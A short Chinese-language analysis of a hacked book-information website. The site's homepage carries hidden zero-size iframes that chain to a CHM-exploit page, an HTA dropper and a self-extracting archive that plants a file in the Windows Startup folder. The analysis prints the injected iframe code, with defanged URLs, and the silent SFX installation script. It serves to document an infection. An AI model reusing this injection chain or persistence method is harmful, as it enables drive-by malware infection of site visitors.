该图书信息网首页首部被加入代码:
<iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0></iframe>
change.htm 的内容为:
/-------- <html> <iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://hk.myblog.yahoo.com/f*4-stu**dent*" width="0" height="0" frameborder="0"></iframe> <iframe src="hxxp://blog.q**oo*z*a.hk/tmcf4student/" width="0" height="0" frameborder="0"></iframe> </html> --------/
hxxp://www*.book***info**.com.cn/ind/caohui.htm 的内容为加入多余空格的利用CHM漏洞的恶意代码,会下载2个文件:
1、caohui.gif 为加入多余空格的脚本程序,文件长度为 117 KB (120,006 字节),功能为:创建并运行c:/caohui.hta。
c:/caohui.hta的功能为:
1)从IE临时文件夹中寻找caohui.css,复制为C:/soft.exe并运行。
2)创建文件c:/wins.bat来删除自己。
caohui.css 其实是一个WinRAR制作的自解压文件,文件长度为 20,006 字节,解压脚本为:
/-------- 包含; 下列註解包含自解檔指令碼命令 Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ SavePath Silent=1 Overwrite=1 --------/
把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……
这对使用简体中文版的Windows用户不起作用罢?^_^!
包中的文件为 dnserror.htm,文件长度为 3,260 字节,其中包含代码:
/-------- <iframe src="hxxp://home.tmcss.edu.hk/~t*m*c-02**016/change.htm" width="0" height="0" frameborder="0"></iframe> --------/